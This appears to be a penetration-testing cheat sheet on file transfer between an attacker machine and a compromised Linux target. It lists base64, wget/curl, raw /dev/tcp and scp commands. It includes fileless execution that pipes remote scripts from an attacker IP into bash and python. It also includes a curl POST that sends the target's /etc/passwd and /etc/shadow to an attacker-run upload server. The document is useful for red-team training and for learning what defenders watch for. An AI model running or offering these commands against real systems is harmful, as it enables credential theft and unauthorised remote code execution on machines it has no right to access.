Base64#

Encode the file

base64 -w 0 ./file

Decode the file

base64 -d 'aGVsbG8=' > ./file

Check integrity

md5sum ./file

Since both machines are linux, those commands can be used 2 ways, upload or download

HTTP#

Download#

wget http://10.10.10.10/file
curl http://10.10.10.10/file -o file

Fileless execution

curl http://10.10.10.10/script.sh | bash
wget -qO- http://10.10.10.10/script.py | python

Minimal. No curl or wget

# File descriptor 3 become tcp socket to 10.10.10.32:80
exec 3<>/dev/tcp/10.10.10.32/80
echo -e "GET /file.sh HTTP/1.1\n\n">&3
cat <&3

Upload#

Https upload server setup

openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:4096 -nodes -sha512 -subj '/CN=server'
pipx install uploadserver
python3 -m uploadserver 4433 --server-certificate ~/server.pem

On client (target) machine

curl -k -X POST https://192.168.49.128:4433/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow'

SSH#

Upload to target

scp ./file user@$target:~/

Download to attacker

scp user@$target:~/file ./
Backward Encrypted Transfer Nginx Forward